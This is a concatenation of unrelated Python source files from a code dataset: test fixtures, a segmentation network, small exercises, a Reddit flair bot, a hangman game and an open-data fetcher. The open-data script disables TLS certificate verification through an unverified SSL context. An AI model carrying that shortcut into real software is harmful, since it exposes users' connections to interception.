TEST.baremetalclient_unracked_nodes = test_data_utils.TestDataContainer()\n TEST.baremetal_unracked_nodes = test_data_utils.TestDataContainer()\n TEST.baremetalclient_nodes_all = test_data_utils.TestDataContainer()\n TEST.baremetal_nodes_all = test_data_utils.TestDataContainer()\n\n node_1 = baremetal.BareMetalNode(\n baremetal.BareMetalNodeManager(None),\n {'id': '1',\n 'name': 'node1',\n 'prov_mac_address': '00-B0-D0-86-AB-F7'})\n node_2 = baremetal.BareMetalNode(\n baremetal.BareMetalNodeManager(None),\n {'id': '2',\n 'name': 'node2',\n 'prov_mac_address': '00-B0-D0-86-AB-F8'})\n node_3 = baremetal.BareMetalNode(\n baremetal.BareMetalNodeManager(None),\n {'id': '3',\n 'name': 'node3',\n 'prov_mac_address': '00-B0-D0-86-AB-F9'})\n node_4 = baremetal.BareMetalNode(\n baremetal.BareMetalNodeManager(None),\n {'id': '4',\n 'name': 'node4',\n 'prov_mac_address': '00-B0-D0-86-AB-F0'})\n node_5 = baremetal.BareMetalNode(\n baremetal.BareMetalNodeManager(None),\n {'id': '5',\n 'name': 'node5',\n 'prov_mac_address': '00-B0-D0-86-AB-F1'})\n\n TEST.baremetalclient_nodes.add(node_1, node_2, node_3, node_4)\n TEST.baremetal_nodes.add(api.Node(node_1),\n api.Node(node_2),\n api.Node(node_3),\n api.Node(node_4))\n TEST.baremetalclient_unracked_nodes.add(node_5)\n TEST.baremetal_unracked_nodes.add(api.Node(node_5))\n TEST.baremetalclient_nodes_all.add(node_1, node_2, node_3, node_4, node_5)\n TEST.baremetal_nodes_all.add(api.Node(node_1),\n api.Node(node_2),\n api.Node(node_3),\n api.Node(node_4),\n api.Node(node_5))\n","sub_path":"tuskar_ui/test/test_data/tuskar_data.py","file_name":"tuskar_data.py","file_ext":"py","file_size_in_byte":7817,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"410314422","text":"__author__ = 'jiangdon'\n\n\nimport numpy as np\nimport matplotlib.pylab as plt\n\n\nN = 10\nxlist = np.linspace(0, 1, N)\nylist = np.sin(2*np.pi*xlist)+np.random.normal(0, 0.2, xlist.size)\nx = np.linspace(0, 1, 1000)\ny = np.sin(2*np.pi*x)\n\nplt.plot(x, y, 'r-')\nplt.plot(xlist, ylist, 'go')\nplt.xlim(0, 1)\nplt.ylim(-1.5, 1.5)\nplt.show()","sub_path":"com/edu/bupt/prml/demo1.py","file_name":"demo1.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"52532475","text":"class Battleship:\n \"\"\"\n Representation of a battleship, holds the battleship positions and validate sinking\n \"\"\"\n def __init__(self, positions):\n \"\"\"\n creates battleship instance based on positions\n :param positions: list of string containing the battleship positions e.g. ['00', '01', '02', '03']\n \"\"\"\n self.positions = positions\n self.hit_positions = []\n self.is_sunk = False\n\n def is_contained(self, position):\n \"\"\"\n checks if the battleship is located at that position\n :param position: a position to be checked, string of row and column e.g. '34'\n :return: 'Z' in case the battleship is located at the given position, 'X' in case the battleship is located at\n the given position and was already hit, 'O' in case the battleship is not located at the given position\n \"\"\"\n if position in self.positions:\n return 'Z'\n elif position in self.hit_positions:\n return 'X'\n return 'O'\n\n def hit(self, position):\n \"\"\"\n try to hit the battleship at the given position\n :param position: a position to be checked, string of row and column e.g. 
'34'\n :return: True in case of a hit, False in case of a miss\n \"\"\"\n if position in self.positions:\n self.hit_positions.append(position)\n self.positions.remove(position)\n if len(self.positions) == 0:\n self.is_sunk = True\n return True\n return False\n","sub_path":"battleship.py","file_name":"battleship.py","file_ext":"py","file_size_in_byte":1542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"362517973","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport math\nimport torch.utils.model_zoo as model_zoo\nfrom torch.autograd import Variable\nfrom collections import OrderedDict\nimport numpy as np\nfrom torch.nn import BatchNorm2d as bn\n\n# __all__ = ['ResNet', 'resnet18', 'resnet34', 'resnet50', 'resnet101', 'resnet152']\n\n\n# model_urls = {\n # 'resnet18': 'https://download.pytorch.org/models/resnet18-5c106cde.pth',\n # 'resnet34': 'https://download.pytorch.org/models/resnet34-333f7ec4.pth',\n # 'resnet50': 'https://download.pytorch.org/models/resnet50-19c8e357.pth',\n # 'resnet101': 'https://download.pytorch.org/models/resnet101-5d3b4d8f.pth',\n # 'resnet152': 'https://download.pytorch.org/models/resnet152-b121ed2d.pth',\n# }\n\n\ndef conv3x3(in_planes, out_planes, stride=1):\n \"\"\"3x3 convolution with padding\"\"\"\n return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride, padding=1, bias=False)\n\n\nclass BasicBlock(nn.Module):\n expansion = 1\n\n def __init__(self, inplanes, planes, stride=1, downsample=None):\n super(BasicBlock, self).__init__()\n self.conv1 = conv3x3(inplanes, planes, stride)\n self.bn1 = nn.BatchNorm2d(planes)\n self.relu = nn.ReLU(inplace=True)\n self.conv2 = conv3x3(planes, planes)\n self.bn2 = nn.BatchNorm2d(planes)\n self.downsample = downsample\n self.stride = stride\n\n def forward(self, x):\n residual = x\n\n out = self.conv1(x)\n out = self.bn1(out)\n out = self.relu(out)\n\n out = self.conv2(out)\n out = self.bn2(out)\n\n if self.downsample is not None:\n residual = self.downsample(x)\n\n out += residual\n out = self.relu(out)\n\n return out\n\n\nclass Bottleneck(nn.Module):\n expansion = 4\n\n def __init__(self, inplanes, planes, stride=1, downsample=None):\n super(Bottleneck, self).__init__()\n self.conv1 = nn.Conv2d(inplanes, planes, kernel_size=1, bias=False)\n self.bn1 = nn.BatchNorm2d(planes)\n self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride,\n padding=1, bias=False)\n self.bn2 = nn.BatchNorm2d(planes)\n self.conv3 = nn.Conv2d(planes, planes * 4, kernel_size=1, bias=False)\n self.bn3 = nn.BatchNorm2d(planes * 4)\n self.relu = nn.ReLU(inplace=True)\n self.downsample = downsample\n self.stride = stride\n\n def forward(self, x):\n residual = x\n\n out = self.conv1(x)\n out = self.bn1(out)\n out = self.relu(out)\n\n out = self.conv2(out)\n out = self.bn2(out)\n out = self.relu(out)\n\n out = self.conv3(out)\n out = self.bn3(out)\n\n if self.downsample is not None:\n residual = self.downsample(x)\n\n out += residual\n out = self.relu(out)\n\n return out\n\n\nclass ResNetNoFc(nn.Module):\n\n def __init__(self, block, layers, num_classes=6):\n self.inplanes = 64\n super(ResNetNoFc, self).__init__()\n self.conv1 = nn.Conv2d(3, 64, kernel_size=7, stride=2, padding=3,\n bias=False)\n self.bn1 = nn.BatchNorm2d(64)\n self.relu = nn.ReLU(inplace=True)\n self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)\n self.layer1 = self._make_layer(block, 64, layers[0])\n self.layer2 = self._make_layer(block, 128, layers[1], 
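# stages 2-4 each start with a stride-2 block that halves the feature map\n            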
stride=2)\n self.layer3 = self._make_layer(block, 256, layers[2], stride=2)\n self.layer4 = self._make_layer(block, 512, layers[3], stride=2)\n # self.avgpool = nn.AvgPool2d(7, stride=1)\n # self.fc = nn.Linear(512 * block.expansion, num_classes)\n\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels\n m.weight.data.normal_(0, math.sqrt(2. / n))\n elif isinstance(m, nn.BatchNorm2d):\n m.weight.data.fill_(1)\n m.bias.data.zero_()\n\n def _make_layer(self, block, planes, blocks, stride=1):\n downsample = None\n if stride != 1 or self.inplanes != planes * block.expansion:\n downsample = nn.Sequential(\n nn.Conv2d(self.inplanes, planes * block.expansion,\n kernel_size=1, stride=stride, bias=False),\n nn.BatchNorm2d(planes * block.expansion),\n )\n\n layers = []\n layers.append(block(self.inplanes, planes, stride, downsample))\n self.inplanes = planes * block.expansion\n for i in range(1, blocks):\n layers.append(block(self.inplanes, planes))\n\n return nn.Sequential(*layers)\n\n def forward(self, x):\n x = self.conv1(x)\n x = self.bn1(x)\n x = self.relu(x)\n x = self.maxpool(x)\n\n x_ds4 = self.layer1(x)\n x_ds8 = self.layer2(x_ds4)\n x_ds16 = self.layer3(x_ds8)\n x_ds32 = self.layer4(x_ds16)\n\n return x_ds32, x_ds16, x_ds8, x_ds4\n\n\ndef resnet18(init_state_path=None, **kwargs):\n model = ResNetNoFc(BasicBlock, [2, 2, 2, 2], **kwargs)\n if init_state_path is not None:\n checkpoint = torch.load(init_state_path, map_location=lambda storage, loc: storage)\n model.load_state_dict(checkpoint)\n return model\n\n\ndef resnet34(init_state_path=None, **kwargs):\n model = ResNetNoFc(BasicBlock, [3, 4, 6, 3], **kwargs)\n if init_state_path is not None:\n checkpoint = torch.load(init_state_path, map_location=lambda storage, loc: storage)\n model.load_state_dict(checkpoint)\n return model\n\n\ndef resnet50(init_state_path=None, **kwargs):\n model = ResNetNoFc(Bottleneck, [3, 4, 6, 3], **kwargs)\n if init_state_path is not None:\n checkpoint = torch.load(init_state_path, map_location=lambda storage, loc: storage)\n model.load_state_dict(checkpoint)\n return model\n\n\ndef resnet101(init_state_path=None, **kwargs):\n model = ResNetNoFc(Bottleneck, [3, 4, 23, 3], **kwargs)\n if init_state_path is not None:\n checkpoint = torch.load(init_state_path, map_location=lambda storage, loc: storage)\n model.load_state_dict(checkpoint)\n return model\n\n\ndef resnet152(init_state_path=None, **kwargs):\n model = ResNetNoFc(Bottleneck, [3, 8, 36, 3], **kwargs)\n if init_state_path is not None:\n checkpoint = torch.load(init_state_path, map_location=lambda storage, loc: storage)\n model.load_state_dict(checkpoint)\n return model\n\n\nclass GCN(nn.Module):\n def __init__(self, feature_in_num, feature_out_num=21, kernal_size=15):\n super(GCN, self).__init__()\n self.left = nn.Sequential(\n nn.Conv2d(feature_in_num, feature_out_num, kernel_size=(kernal_size, 1), stride=1,\n padding=((kernal_size - 1) / 2, 0), bias=True),\n nn.Conv2d(feature_out_num, feature_out_num, kernel_size=(1, kernal_size), stride=1,\n padding=(0, (kernal_size - 1) / 2), bias=True)\n )\n self.right = nn.Sequential(\n nn.Conv2d(feature_in_num, feature_out_num, kernel_size=(1, kernal_size), stride=1,\n padding=(0, (kernal_size - 1) / 2), bias=True),\n nn.Conv2d(feature_out_num, feature_out_num, kernel_size=(kernal_size, 1), stride=1,\n padding=((kernal_size - 1) / 2, 0), bias=True)\n )\n\n def forward(self, x):\n return self.left(x) + self.right(x)\n\n\nclass BR(nn.Module):\n def 
__init__(self, feature_num=21):\n super(BR, self).__init__()\n self.transform = nn.Sequential(\n nn.Conv2d(feature_num, feature_num, kernel_size=3, stride=1, padding=1, bias=True),\n nn.ReLU(inplace=True),\n nn.Conv2d(feature_num, feature_num, kernel_size=3, stride=1, padding=1, bias=True)\n )\n\n def forward(self, x):\n return x + self.transform(x)\n\n\nclass GCNMoudle(nn.Module):\n def __init__(self, features_in_num, feature_out_num=21, kernal_size=15):\n super(GCNMoudle, self).__init__()\n self.kernal_size = kernal_size\n self.transform = []\n for i in range(len(features_in_num)):\n self.transform.append(self._feature_transform(features_in_num[i], feature_out_num))\n\n self.transform = nn.ModuleList(self.transform)\n\n def _feature_transform(self, feature_in_num, feature_out_num):\n transform = nn.Sequential(\n GCN(feature_in_num, feature_out_num, kernal_size=self.kernal_size),\n BR(feature_out_num)\n )\n\n return transform\n\n def forward(self, x):\n output = []\n for i in range(len(x)):\n output.append(self.transform[i](x[i]))\n\n return output\n\nclass CAB(nn.Module):\n def __init__(self):\n super(CAB, self).__init__()\n self.score_map = nn.Sequential(\n nn.AdaptiveAvgPool2d(1),\n nn.Conv2d(42, 42, kernel_size=1),\n nn.ReLU(inplace=True),\n nn.Conv2d(42, 21, kernel_size=1)\n\n )\n def forward(self, x_high, x_low):\n x = torch.cat((x_high, x_low), dim=1)\n x = self.score_map(x)\n x = F.sigmoid(x)\n x = x * x_low\n x = x + x_high\n return x\n\nclass OuputMoudle(nn.Module):\n def __init__(self, feature_num):\n super(OuputMoudle, self).__init__()\n self.transform0 = nn.ConvTranspose2d(feature_num, feature_num, kernel_size=2, stride=2, padding=0, bias=True)\n self.transform1 = nn.Sequential(\n BR(feature_num),\n nn.ConvTranspose2d(feature_num, feature_num, kernel_size=2, stride=2, padding=0, bias=True)\n )\n self.transform2 = nn.Sequential(\n BR(feature_num),\n nn.ConvTranspose2d(feature_num, feature_num, kernel_size=2, stride=2, padding=0, bias=True)\n )\n self.transform3 = nn.Sequential(\n BR(feature_num),\n nn.ConvTranspose2d(feature_num, feature_num, kernel_size=2, stride=2, padding=0, bias=True),\n BR(feature_num),\n nn.ConvTranspose2d(feature_num, feature_num, kernel_size=2, stride=2, padding=0, bias=True),\n BR(feature_num)\n )\n self.cab1 = CAB()\n self.cab2 = CAB()\n self.cab3 = CAB()\n\n def forward(self, x):\n out = self.transform0(x[0])\n out = self.cab1(out, x[1])\n out = self.transform1(out)\n out = self.cab2(out, x[2])\n out = self.transform2(out)\n out = self.cab3(out, x[3])\n out = self.transform3(out)\n\n return out\n\n\nclass MergeModule(nn.Module):\n def __init__(self, feature_num=21, num_level=4):\n super(MergeModule, self).__init__()\n self.transform = []\n for i in range(num_level):\n self.transform.append(self._feature_transform(feature_num))\n\n self.transform = nn.ModuleList(self.transform)\n\n def _feature_transform(self, feature_num):\n transform = nn.Sequential(\n BR(feature_num),\n nn.ConvTranspose2d(feature_num, feature_num, kernel_size=2, stride=2, padding=0, bias=True)\n )\n\n return transform\n\n def forward(self, x):\n output = []\n output.append(x[0])\n\n for i in range(1, len(x)):\n output.append(x[i] + self.transform[i - 1](output[i - 1]))\n\n return output\n\n\nclass UpsampleModule(nn.Module):\n def __init__(self, feature_num=21, upsample_factors=[8, 4, 2, 1]):\n super(UpsampleModule, self).__init__()\n self.transform = []\n for i in range(len(upsample_factors)):\n self.transform.append(self._feature_transform(feature_num, upsample_factors[i]))\n\n 
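# nn.ModuleList registers each per-level transform's parameters with this module\n        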
self.transform = nn.ModuleList(self.transform)\n\n def _feature_transform(self, feature_num, upsample_factor):\n transform = nn.Sequential(\n BR(feature_num),\n nn.Upsample(scale_factor=upsample_factor, mode='bilinear')\n # nn.ConvTranspose2d(feature_num, feature_num, kernel_size=2, stride=upsample_factor, padding=0, bias=True)\n )\n\n return transform\n\n def forward(self, x):\n output = []\n for i in range(len(x)):\n output.append(self.transform[i](x[i]))\n\n return output\n\n\nclass ResnetGCN_CAB(nn.Module):\n def __init__(self, class_num=6, resnet_depth=18, kernal_size=15, feature_num=21, init_resnet_state_path=None,\n init_state_path=None):\n super(ResnetGCN_CAB, self).__init__()\n\n self.GCN = nn.Sequential(\n #GCNMoudle(features_in_num=[2048, 1024, 512, 256], feature_out_num=feature_num, kernal_size=kernal_size),\n GCNMoudle(features_in_num=[512, 256, 128, 64], feature_out_num=feature_num, kernal_size=kernal_size),\n OuputMoudle(feature_num=feature_num)\n )\n\n self.classification = nn.Conv2d(feature_num, class_num, kernel_size=1, stride=1, padding=0, bias=True)\n\n self._initialize_weights()\n\n if resnet_depth == 18:\n self.resnet = resnet18(init_state_path=init_resnet_state_path)\n\n\n\n def forward(self, x, target=None):\n resnet_output = self.resnet(x)\n gcn_output = self.GCN(resnet_output)\n out = self.classification(gcn_output)\n\n softmax_output = F.softmax(out)\n\n mask_out = Variable(softmax_output.data.max(1)[1])\n out_forshow = torch.max(softmax_output, dim=1)[1]\n\n if target is not None:\n pairs = {'out': (out, target),\n 'out2': (out, target),\n 'mask_out': (mask_out, target)\n }\n return pairs, self.exports(x, out_forshow * np.float(255.0), target * np.float(255.0))\n else:\n return self.exports(x, out_forshow, softmax_output)\n\n def exports(self, x, output, target):\n result = {'input': x, 'output': output}\n if target is not None:\n result['soft_out'] = target\n return result\n\n def _initialize_weights(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels\n m.weight.data.normal_(0, 0.01)\n if m.bias is not None:\n m.bias.data.zero_()\n elif isinstance(m, nn.BatchNorm2d):\n m.weight.data.fill_(1)\n m.bias.data.zero_()\n elif isinstance(m, nn.Linear):\n n = m.weight.size(1)\n m.weight.data.normal_(0, 0.01)\n m.bias.data.zero_()\n\ndef netParams(model):\n '''\n helper function to see total network parameters\n :param model: model\n :return: total network parameters\n '''\n total_paramters = 0\n for parameter in model.parameters():\n i = len(parameter.size())\n p = 1\n for j in range(i):\n p *= parameter.size(j)\n total_paramters += p\n\n return total_paramters\n\ndef get_FileSize(file_path):\n import os\n file_path = unicode(file_path, 'utf8')\n fsize = os.path.getsize(file_path)\n fsize = fsize / float(1024*1024)\n return round(fsize, 2)\n\nif __name__ == \"__main__\":\n import time\n\n images = Variable(torch.randn(1, 3, 512, 512))\n d = ResnetGCN_CAB()\n d = nn.DataParallel(d).cuda()\n print (d)\n print (\"do forward...\")\n start_time = time.time()\n outputs = d(images)\n import os\n\n print('process ', os.path.basename(__file__))\n print (outputs['output'].size())\n print('time:', time.time() - start_time)\n print('total parameter:', netParams(d))\n model_name = 'resnet_gcn_seg.pth'\n torch.save(d.state_dict(), model_name)\n print('model size:', get_FileSize(model_name), 
'MB')\n","sub_path":"resnet_gcn_cab_with_sigmoid.py","file_name":"resnet_gcn_cab_with_sigmoid.py","file_ext":"py","file_size_in_byte":15625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"330982931","text":"import math\n\nimport numpy as np\n\nfrom homework.ClassifierModel import Classifier\n\n\nclass Fisher(Classifier):\n def __init__(self):\n Classifier.__init__(self)\n self.u0 = None\n self.u1 = None\n\n def get_data(self, split):\n split_num = int(self.m * split)\n self.train_data = self.sample_data[0:split_num]\n self.test_data = self.sample_data[split_num:]\n self.expected = self.test_data[:, -1]\n\n def fit(self):\n n = self.sample_data.shape[1]\n data1 = np.mat([row for row in self.train_data if row[n - 1] > 0.5])\n data0 = np.mat([row for row in self.train_data if row[n - 1] < 0.5])\n x1 = data1[:, 0:-1]\n x0 = data0[:, 0:-1]\n num1 = x1.shape[0]\n num0 = x0.shape[0]\n u1 = sum(x1) / num1\n u0 = sum(x0) / num0\n s1 = np.mat(np.zeros((n - 1, n - 1)))\n s0 = np.mat(np.zeros((n - 1, n - 1)))\n for row in x1:\n e = np.mat(row - u1)\n s = e.T * e\n s1 += s\n for row in x0:\n e = np.mat(row - u0)\n s = e.T * e\n s0 += s\n sw = s0 + s1\n u = np.mat(u0 - u1)\n self.weights = sw.I * u.T\n self.u1 = u1\n self.u0 = u0\n\n def predict(self):\n feature_set = np.mat(self.test_data[:, 0:-1])\n u0_mean = self.u0 * self.weights\n u1_mean = self.u1 * self.weights\n for row in feature_set:\n u = row * self.weights\n if math.fabs(u1_mean - u) < math.fabs(u0_mean - u):\n row[0, 0] = 1\n else:\n row[0, 0] = 0\n self.predicted = feature_set[:, 0]\n","sub_path":"homework/FisherModel.py","file_name":"FisherModel.py","file_ext":"py","file_size_in_byte":1648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"480481340","text":"from itertools import groupby\n\n\ndef compress_string(s):\n keys = []\n groups = []\n for key, group in groupby(s):\n keys.append(int(key))\n groups.append(len(list(group)))\n\n # print(keys, groups)\n return list(zip(groups, keys))\n\n\nif __name__ == \"__main__\":\n # print(compress_string(\"111132222111132323\"))\n print(\"OK\" if compress_string('1222311') == [(1, 1), (3, 2), (1, 3), (2, 1)] else \"NOT OK\")\n","sub_path":"week_08/scripts/ex_8.py","file_name":"ex_8.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"401224137","text":"import time\n\ndef updateRedditFlairs(subreddit, reddit):\n print(\"Hit the updateRedditFlairs function\")\n \"\"\"\n Bulk updates user flairs for the subreddit\n @param subreddit: PRAW Subreddit object instantiated with the subreddit of your choice (to change flair)\n @param reddit: PRAW Reddit object instantiated with the current user (to respond to messages)\n \"\"\"\n flair = subreddit.flair\n # We limit ourselves to 25 at a time to stay within API limits\n messages = []\n messages = reddit.inbox.unread(limit=25)\n\n messages = [message for message in messages]\n\n messagesToMark = []\n print(\"Got {num} unread flair requests!\".format(num=len(messages)))\n\n # Only do this part if there are any messages\n if len(messages) > 0:\n # Maybe this is redundant?\n while len(messages) > 0:\n # Iterate over all messages\n for message in messages:\n # Ensure the format of the request was correct\n if message.subject == \"flair\" and len(message.body) == 4 and message.author != \"[deleted]\":\n # Set the user's flair\n flair.set(\n 
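# message.body holds the 4-character flair CSS class validated above\n                        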
redditor=message.author,\n css_class=message.body\n )\n print('Updated flair for {name} with flair class {flairClass}'.format(name=message.author, flairClass=message.body))\n # Reply to user and let them know their flair was updated\n message.reply(\"Flair for /r/WhoWouldWin Updated! Please do not respond to this message. Instead, send modmail to /r/WhoWouldWin.\")\n else:\n # Format was incorrect, or something else is wrong\n print(\"Skipped request from {name} with flair class {flairClass}\".format(name=message.author, flairClass=message.body))\n message.reply(\"Sorry, it doesn't look like your flair request for /r/WhoWouldWin was valid. Please do not respond to this message. Instead, send modmail to /r/WhoWouldWin.\")\n # Append this message to larger array of messages to be bulk marked as unread\n messagesToMark.append(message)\n # Mark all the previous messages as having been read\n print(\"Marking {numMessages} as unread...\".format(numMessages=len(messagesToMark)))\n reddit.inbox.mark_read(messagesToMark)\n\n # Wait 65 seconds (greater than 60 just in case...)\n print(\"Waiting 65 seconds between getting new flair requests...\")\n time.sleep(65)\n\n # Get new messages, and repeat the loop from the top\n messages = reddit.inbox.unread(limit=25)\n messages = [message for message in messages]\n print(\"Got {num} unread flair requests!\".format(num=len(messages)))\n messagesToMark = []\n print(\"No more requests to process!\")\n return True\n\n else:\n # If no new requests, exit\n print(\"No new flair requests!\")\n return True\n","sub_path":"bot_scripts/updateRedditFlairs/update_flairs.py","file_name":"update_flairs.py","file_ext":"py","file_size_in_byte":3045,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"317551318","text":"import random\nimport os\nimport pygame\nfrom turtle import *\nimport time\n\n\ndef choose_word():\n return random.sample(WORDS, 1) # chooses a word to play with\n\n\ndef clear_screen():\n os.system(\"cls\" if os.name == \"nt\" else \"clear\") # clears screen\n\n\ndef hangman_(attempt=0):\n if attempt == 0:\n color('black')\n pensize(5)\n speed(5)\n fd(150)\n lt(180)\n fd(100)\n rt(90)\n fd(300)\n rt(90)\n fd(75)\n rt(90)\n fd(50)\n elif attempt == 1:\n rt(90)\n circle(25)\n return None\n elif attempt == 2:\n circle(25, 180)\n rt(90)\n fd(25)\n rt(90)\n fd(50)\n rt(180)\n fd(100)\n rt(180)\n fd(50)\n lt(90)\n fd(25)\n elif attempt == 3:\n rt(180)\n fd(25)\n lt(90)\n fd(50)\n lt(65)\n fd(25)\n lt(180)\n fd(50)\n elif attempt == 4:\n lt(180)\n fd(25)\n lt(115)\n fd(100)\n lt(120)\n fd(25)\n rt(180)\n fd(50)\n elif attempt == 5:\n rt(180)\n fd(25)\n lt(60)\n fd(50)\n lt(90)\n fd(55)\n elif attempt == 6:\n fd(20)\n elif attempt == 7:\n rt(45)\n fd(50)\n elif attempt == 8:\n fd(25)\n elif attempt == 9:\n rt(180)\n fd(75)\n rt(90)\n fd(50)\n elif attempt == 10:\n fd(25)\n print('You may now close turtle')\n done()\n\n\ndef game_loop():\n penup() # Set turtle to the correct position, make adjustment as you wish to setx and sety\n setx(-200)\n sety(-200)\n pendown()\n fd(1) # You must initialize turtle before pygame or else you will get an error\n pygame.init()\n hangman = pygame.mixer.Sound(\"./media/HangmanWav1.wav\")\n hangman.play()\n input(\"Press 'Enter' to play Hangman! 
\") # starts game\n pygame.init()\n hangman = pygame.mixer.Sound(\"./media/RUN.wav\")\n hangman.play()\n clear_screen() # clears screen\n word = choose_word()[0] # chooses a word\n word_guessed = [] # word in '-' and letter form\n for _ in word:\n word_guessed.append(\"-\") # create an unguessed, blank version of the word\n joined_word = None # joins the words in the list word_guessed\n tries = 10 # how many times you are aloud to fail\n guessed_letters = [] # list of all letters guessed\n hangman_() # Draws hangman\n while tries != 0 and \"-\" in word_guessed:\n print(\"\\nYou have {} attempts remaining\".format(tries))\n pygame.init()\n hangman = pygame.mixer.Sound(\"./media/Tries.wav\")\n hangman.play()\n time.sleep(3)\n strs = ''.join(word_guessed)\n print(strs)\n try:\n pygame.init()\n hangman = pygame.mixer.Sound(\"./media/Select.wav\")\n hangman.play()\n time.sleep(4)\n player_guess = str(input(\"\\nPlease select a letter between A-Z\" + \"\\n> \")).lower()\n\n except ValueError: # check valid input\n pygame.init()\n hangman = pygame.mixer.Sound(\"./media/ValidInput.wav\")\n hangman.play()\n print(\"That is not valid input. Please try again.\")\n time.sleep(3)\n continue\n\n else:\n if not player_guess.isalpha(): # check the input is a letter. Also checks an input has been made.\n pygame.init()\n hangman = pygame.mixer.Sound(\"./media/NotLetter.wav\")\n hangman.play()\n print(\"That is not a letter. Please try again.\")\n time.sleep(4.5)\n continue\n elif len(player_guess) > 1: # check the input is only one letter\n pygame.init()\n hangman = pygame.mixer.Sound(\"./media/MoreLetter.wav\")\n hangman.play()\n print(\"That is more than one letter. Please try again.\")\n time.sleep(3)\n continue\n elif player_guess in guessed_letters: # check it letter hasn't been guessed already\n pygame.init()\n hangman = pygame.mixer.Sound(\"./media/Guessed.wav\")\n hangman.play()\n print(\"You have already guessed that letter. Please try again.\")\n time.sleep(5)\n continue\n else:\n pass\n\n guessed_letters.append(player_guess)\n\n for letter in range(len(word)):\n if player_guess.lower() == (word[letter].lower()):\n word_guessed[letter] = player_guess # replace all letters in the chosen word that match the players guess\n pygame.init()\n drums = pygame.mixer.Sound(\"./media/drum_roll_y.wav\")\n drums.play()\n\n if player_guess.lower() not in word.lower():\n tries -= 1\n pygame.init()\n gasp = pygame.mixer.Sound(\"./media/gasp_x.wav\")\n gasp.play()\n hangman_(10-tries)\n\n if \"-\" not in word_guessed: # no blanks remaining\n pygame.init()\n hangman = pygame.mixer.Sound(\"./media/Congrats.wav\")\n hangman.play()\n print(\"\\nCongratulations! {} was the word!\".format(word))\n pygame.init()\n cymbal = pygame.mixer.Sound(\"./media/applause3.wav\")\n cymbal.play()\n ball = pygame.mixer.Sound(\"./media/woow_x.wav\")\n ball.play()\n sphere = pygame.mixer.Sound(\"./media/Victory.wav\")\n sphere.play()\n reset()\n else: # loop must have ended because attempts reached 0\n pygame.init()\n hangman = pygame.mixer.Sound(\"./media/Unlucky.wav\")\n hangman.play()\n print(\"\\nUnlucky! 
The word was {}.\".format(word))\n pygame.init()\n hangman = pygame.mixer.Sound(\"./media/fail-trombone-02.wav\")\n hangman.play()\n\ntext_file = open('test.txt','rb')\ntext_content = str(text_file.read())[2:-1]\nWORDS = text_content.split(r'\\r\\n')[:-1]\n\ngame_loop()","sub_path":"hangman.py","file_name":"hangman.py","file_ext":"py","file_size_in_byte":5962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"149995968","text":"#!/usr/bin/env python\n# -*- coding=utf-8 -*-\n__author__ = \"Chen\"\n\"\"\"\n桃園市住宿資料(中)\nInfoId(序號)、TYWebsite(導覽網網址)、Name(名稱)、Toldescribe(簡述)、Add(地址)、Zipcode(郵遞區號)、\nOpentime(開放時間)、Px(X座標)、Py(Y座標)、Website(網站)、Parkinginfo(停車資訊)、Remarks(旅遊叮嚀)、\nTel(電話)、Fax(傳真)、Changetime(更新時間)、Charge(更新時間)\n\"\"\"\n\nimport json\nimport sys \nimport urllib.request as httplib # 3.x\nimport ssl\ncontext = ssl._create_unverified_context()\n\nurl=\"https://data.tycg.gov.tw/opendata/datalist/datasetMeta/download?id=908d67d9-eb77-4f17-88c2-068b2dd74d27&rid=c3340a19-9219-498a-9a46-21de506ba85b\"\nreq=httplib.Request(url)\ntry:\n reponse = httplib.urlopen(req, context=context)\n if reponse.code==200:\n if (sys.version_info > (3, 0)):\n contents = reponse.read();\n else:\n contents = reponse.read()\n data = json.loads(contents)\n #html\n \"\"\"\n print(data['infos'][0])\n print(len(data['infos']))\n print(\"====\",data['infos'][0]['Name'],\"====\")\n print(\"導覽網址\",data['infos'][0]['TYWebsite'])\n print(\"地址\",data['infos'][0]['Add'])\n print(\"營業時間\",data['infos'][0]['Opentime'])\n print(\"停車資訊\",data['infos'][0]['Parkinginfo'])\n print(\"電話\",data['infos'][0]['Tel'])\n \"\"\"\n\n for x in range(0,len(data['infos'])):\n print(\"====\", data['infos'][x]['Name'], \"====\")\n print(\"地址\", data['infos'][x]['Add'])\n print(\"電話\", data['infos'][x]['Tel'])\n #else:\n # print(\"查無您所輸入的相關資料,請檢查是否有打錯字或是更換搜尋訊息\")\n\n\nexcept: # 處理網路連線異常\n print(\"error\") ","sub_path":"專05-LINE/3-HTTP_JSON -桃園市住宿.py","file_name":"3-HTTP_JSON -桃園市住宿.py","file_ext":"py","file_size_in_byte":1872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"181772822","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /Users/x0ox/Dropbox/ActiveDev/yac/yac/lib/cache.py\n# Compiled at: 2017-11-16 20:28:41\nimport shelve, os, sys, time, datetime\nfrom yac.lib.paths import get_config_path\n\nclass CacheError:\n\n def __init__(self, msg):\n self.msg = msg\n\n\ndef set_cache_value_ms(key_name, value, expiration_ms=''):\n yac_db = _get_cache()\n if not expiration_ms:\n expiration_dt = datetime.date.today() + 